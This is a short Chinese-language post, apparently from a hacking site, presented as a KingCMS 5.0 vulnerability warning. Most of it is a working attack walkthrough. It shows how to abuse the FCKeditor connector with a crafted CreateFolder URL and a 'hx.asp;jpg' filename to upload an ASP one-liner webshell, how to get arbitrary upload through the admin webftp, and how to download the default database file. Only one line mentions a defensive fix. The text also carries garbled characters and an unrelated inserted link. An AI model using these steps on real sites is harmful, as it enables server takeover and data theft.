1,
kingcms 5.0 漏洞漏洞預警
。kingcms 5.0 fckeditor的默認路徑在admin/system/editor/FCKeditor/editor/fckeditor.Html
把本地的馬命名為 hx.asp;jpg 注意看 jpg前面沒有點了..
OK了..其實以后做站結合fckeditor這類的編輯器..最好加個驗證..只有管理才能訪問..這樣或者比較好吧
2。編輯器路徑:
/admin/system/editor/
利用方式:訪問
http://www.myhack58.com/admin/system/editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/1.asp&NewFolderName=qing.asp
后在
/up_files/image/
目錄下創(chuàng)建一個明文1.asp的文件夾,
電腦資料
《kingcms 5.0 漏洞漏洞預警》(http://clearvueentertainment.com)。然后訪問
http://www.myhack58.com/admin/system/editor/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp
,選擇剛創(chuàng)建的1.asp文件夾并上傳圖片木馬,可以上傳包含一句話內(nèi)容的圖片,然后使用一句話客戶端連接。
3。該系統(tǒng)后臺也是比較脆弱的,若能成功登陸后臺拿webshell比較簡單,后臺中有個webftp的功能,可以上傳任意文件。默認數(shù)據(jù)庫地址為/db/King#Content#Management#System.mdb,下載的時候將#替換成%23后下載。
有很多存在FCKEDITOR編輯器的基本存在該漏洞 與其說是KINGCMS的漏洞不如說是FCKEDITOR的漏洞